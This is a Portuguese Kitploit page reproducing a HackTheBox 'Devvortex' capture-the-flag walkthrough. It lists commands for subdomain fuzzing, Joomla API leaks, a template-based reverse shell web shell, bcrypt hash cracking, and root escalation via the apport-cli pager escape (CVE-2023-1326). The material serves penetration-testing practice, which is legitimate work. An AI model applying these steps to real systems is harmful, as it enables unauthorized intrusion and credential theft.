Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
DEVVORTEX — Walkthrough do HackTheBox Devvortex abordando fuzzing de subdomínio, enumeração da API do Joomla, web shell baseada em template, quebra de hash bcrypt e escalação de privilégios via Apport-CLI CVE-2023-1326. | Kitploit
Ferramentas/GitHubGitHub/r3fr4kt/devvortex
Quebra de SenhasEscalada de PrivilégiosAnálise de VulnerabilidadesExploração de Aplicações WebColeta de InformaçõesCTFTestes de PenetraçãoEnumeração de SubdomíniosAprendizado e EducaçãoLabs e Prática
GitHubr3fr4kt/devvortex
há 7h 58mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

DEVVORTEX

Walkthrough do HackTheBox Devvortex abordando fuzzing de subdomínio, enumeração da API do Joomla, web shell baseada em template, quebra de hash bcrypt e escalação de privilégios via Apport-CLI CVE-2023-1326.

Ver Repositório

DEVVORTEX

HackTheBox: Devvortex — Write-Up da Máquina

Um walkthrough técnico abrangente detalhando o comprometimento da máquina Devvortex no HackTheBox. Este caminho demonstra Fuzzing de Subdomínios, Enumeração da API do Joomla, Modificação de Template para acesso inicial, Extração e Quebra de Hash do Banco de Dados para movimento lateral, e exploração do Apport-CLI (CVE-2023-1326) para escalação de privilégios até root.


Resumo Executivo

  • SO Alvo: Linux
  • Dificuldade: Fácil
  • Domínio: devvortex.htb
  • Subdomínio: dev.devvortex.htb
  • Conceitos-Chave: Enumeração de Subdomínios, Exploração do CMS Joomla, Divulgação de Informações, Quebra de Hash Bcrypt, Abuso de Sudo (apport-cli).

1. Reconhecimento & Enumeração

Varredura de Portas (Nmap)

Uma descoberta inicial rápida de portas TCP foi realizada em todas as portas:

root@kitploit:~
nmap -Pn -n -p- --open --min-rate 5000 <TARGET_IP>

Uma varredura subsequente de detecção de serviço e versão foi executada contra as portas abertas identificadas:

Bash

root@kitploit:~
nmap -sCV --min-rate 5000 -p22,80 <TARGET_IP>

Configuração do Hostfile

Adicione o domínio base alvo à sua tabela de resolução de nomes local:

Bash

root@kitploit:~
sudo nano /etc/hosts
# Append: <TARGET_IP> devvortex.htb

Descoberta de Subdomínios (FFUF)

Fuzzing de hosts virtuais para identificar ativos web adicionais:

Bash

root@kitploit:~
ffuf -u [http://FUZZ.devvortex.htb](http://FUZZ.devvortex.htb) -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ

Resultado: Descoberto dev.devvortex.htb. Adicionado dev.devvortex.htb a /etc/hosts.

Fuzzing de Diretórios

Enumerando rotas no host virtual recém-descoberto:

Bash

root@kitploit:~
ffuf -u [http://dev.devvortex.htb/FUZZ](http://dev.devvortex.htb/FUZZ) -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt:FUZZ

Resultado: Descoberto o endpoint /administrator, expondo um portal de autenticação de administrador do Joomla.

2. Acesso Inicial (Foothold)

Vazamento de Informações via API do Joomla

Sondando endpoints públicos expostos pela API REST do Joomla para coletar métricas sensíveis da aplicação e usuários:

Bash

root@kitploit:~
curl -s [http://dev.devvortex.htb/api/index.php/v1/users?public=true](http://dev.devvortex.htb/api/index.php/v1/users?public=true)
curl -s [http://dev.devvortex.htb/api/index.php/v1/application?public=true](http://dev.devvortex.htb/api/index.php/v1/application?public=true)

Injeção de Web Shell via Templates do Site

Usando credenciais descobertas durante a enumeração, faça login no portal /administrator do Joomla:

  1. Navegue até System > Site Templates.

  2. Selecione o template ativo e abra error.php.

  3. Substitua o conteúdo de error.php por um payload padrão de reverse shell em PHP.

Inicie um listener netcat local:

Bash

root@kitploit:~
nc -lvnp 4444

Dispare a execução de error.php solicitando uma página inexistente ou acessando o arquivo diretamente.

Estabilização da Shell TTY

Assim que a shell conectar como www-data, gere uma sessão PTY interativa:

Bash

root@kitploit:~
python3 -c 'import pty; pty.spawn("/bin/bash")'

3. Movimento Lateral (Logan)

Enumeração do Banco de Dados

Acesse o banco de dados MySQL local usando credenciais recuperadas dos arquivos de configuração web:

Bash

root@kitploit:~
mysql -u lewis -p

Consulte a tabela de usuários para localizar hashes de credenciais armazenados:

SQL

root@kitploit:~
SHOW DATABASES;
USE joomla;
SHOW TABLES;
SELECT username, password FROM sd4fg_users;

Quebra de Senha Offline

Extraia o hash de senha bcrypt do usuário logan para um arquivo local:

Bash

root@kitploit:~
nano hash.txt

Quebre o hash usando John the Ripper junto com rockyou.txt:

Bash

root@kitploit:~
john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Autenticação via SSH

Estabeleça uma sessão SSH persistente como usuário logan com as credenciais quebradas:

Bash

root@kitploit:~
ssh [email protected]

Flag de Usuário

Bash

root@kitploit:~
cat user.txt

4. Escalação de Privilégios

Auditoria de Privilégios Sudo

Inspecione binários permitidos para o usuário logan:

Bash

root@kitploit:~
sudo -l

Saída: O usuário pode executar /usr/bin/apport-cli como root.

Exploração do Apport-CLI (CVE-2023-1326)

Verifique a versão instalada do apport-cli:

Bash

root@kitploit:~
apport-cli --version

Inspecione /var/crash em busca de arquivos de relatório existentes. Se estiver vazio, crie manualmente um arquivo de crash:

Bash

root@kitploit:~
echo "ProblemType: Crash" > /var/crash/.crash

Inicie o apport-cli contra o arquivo de crash criado usando sudo:

Bash

root@kitploit:~
sudo /usr/bin/apport-cli -c /var/crash/.crash
  1. Pressione v para View report.

  2. Quando o paginador (less) carregar o conteúdo, escape para uma shell do sistema digitando:

Plaintext

root@kitploit:~
!/bin/bash

5. Consolidação do Sistema

Verifique a elevação para root:

Bash

root@kitploit:~
whoami
# Output: root

Flag de Root

Bash

root@kitploit:~
cat /root/root.txt
Baixar ferramenta